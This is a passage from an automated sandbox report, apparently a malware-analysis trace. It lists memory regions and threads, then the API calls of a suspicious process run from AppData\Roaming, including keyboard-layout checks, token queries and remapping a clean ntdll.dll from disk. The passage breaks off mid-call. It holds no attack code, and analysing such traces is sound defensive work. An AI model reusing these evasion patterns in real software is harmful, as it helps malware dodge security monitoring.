mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1496 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1497 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1498 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1499 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1500 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1501 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1502 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1503 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1504 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1505 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1506 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1507 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1508 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1509 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1510 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1511 start_va = 0x7fffff48000 end_va = 0x7fffff49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff48000" filename = "" Region: id = 1512 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 1513 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 1514 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 1515 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1516 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1517 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1518 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1519 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1520 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1521 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1522 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1523 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1524 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1525 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1526 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1527 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1528 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1529 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1530 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1531 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1532 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1533 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1534 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1535 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1536 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1537 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1538 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1539 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1540 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1541 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1542 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1543 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1544 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1545 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1546 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1547 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1548 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1549 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1550 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1551 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1552 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2149 start_va = 0x1610000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 2150 start_va = 0x26f0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 2151 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2152 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2192 start_va = 0x1fc0000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Thread: id = 50 os_tid = 0xee0 Thread: id = 51 os_tid = 0xe3c Thread: id = 52 os_tid = 0xe38 Thread: id = 53 os_tid = 0xdc8 Thread: id = 54 os_tid = 0xdc4 Thread: id = 55 os_tid = 0xda0 Thread: id = 56 os_tid = 0x480 Thread: id = 57 os_tid = 0x43c Thread: id = 58 os_tid = 0x254 Thread: id = 59 os_tid = 0x4f0 Thread: id = 60 os_tid = 0x128 Thread: id = 61 os_tid = 0x6c4 Thread: id = 62 os_tid = 0x464 Thread: id = 63 os_tid = 0x5d0 Thread: id = 64 os_tid = 0x410 Thread: id = 65 os_tid = 0x478 Thread: id = 66 os_tid = 0x444 Thread: id = 67 os_tid = 0x440 Thread: id = 68 os_tid = 0x76c Thread: id = 69 os_tid = 0x748 Thread: id = 70 os_tid = 0x730 Thread: id = 71 os_tid = 0x724 Thread: id = 72 os_tid = 0x6fc Thread: id = 73 os_tid = 0x6e8 Thread: id = 74 os_tid = 0x6e0 Thread: id = 75 os_tid = 0x6c0 Thread: id = 76 os_tid = 0x6ac Thread: id = 77 os_tid = 0x694 Thread: id = 78 os_tid = 0x4b0 Thread: id = 79 os_tid = 0x4ac Thread: id = 80 os_tid = 0x49c Thread: id = 81 os_tid = 0x498 Thread: id = 82 os_tid = 0x48c Thread: id = 83 os_tid = 0x1bc Thread: id = 84 os_tid = 0x120 Thread: id = 85 os_tid = 0x3f0 Thread: id = 86 os_tid = 0x3e4 Thread: id = 87 os_tid = 0x3d8 Thread: id = 88 os_tid = 0x378 Thread: id = 89 os_tid = 0x36c Thread: id = 90 os_tid = 0x364 Thread: id = 92 os_tid = 0xf2c Thread: id = 93 os_tid = 0xf30 Thread: id = 121 os_tid = 0xf88 Process: id = "7" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0x37c92000" os_pid = "0xf3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf18" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1640 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1641 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1642 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1643 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1644 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1645 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1646 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x403410 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 1647 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1648 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1649 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1650 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1651 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1652 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1653 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1654 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1655 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1656 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1657 start_va = 0x200000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1658 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1659 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1660 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1661 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1662 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1663 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1664 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1665 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1666 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1667 start_va = 0x280000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1668 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1669 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1670 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1671 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1672 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1673 start_va = 0x2f0000 end_va = 0x356fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1674 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1675 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1676 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1677 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1678 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1679 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1680 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1681 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1682 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1683 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1684 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1685 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1686 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1687 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1688 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1689 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1690 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1691 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1692 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1693 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1694 start_va = 0x830000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1695 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1696 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1697 start_va = 0x1c30000 end_va = 0x1daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1698 start_va = 0x1a0000 end_va = 0x1a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1699 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1700 start_va = 0x1b0000 end_va = 0x1b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1702 start_va = 0x1e0000 end_va = 0x1f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Thread: id = 94 os_tid = 0xf40 [0155.572] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0155.572] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0155.572] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0155.572] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0155.607] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0155.607] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0155.607] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0155.607] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0155.613] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0155.613] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x414758 [0155.613] GetKeyboardLayoutList (in: nBuff=1, lpList=0x414758 | out: lpList=0x414758) returned 1 [0155.614] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0155.614] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0155.614] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0155.614] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0155.615] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0155.616] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1c30000 [0155.617] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0155.617] wcsstr 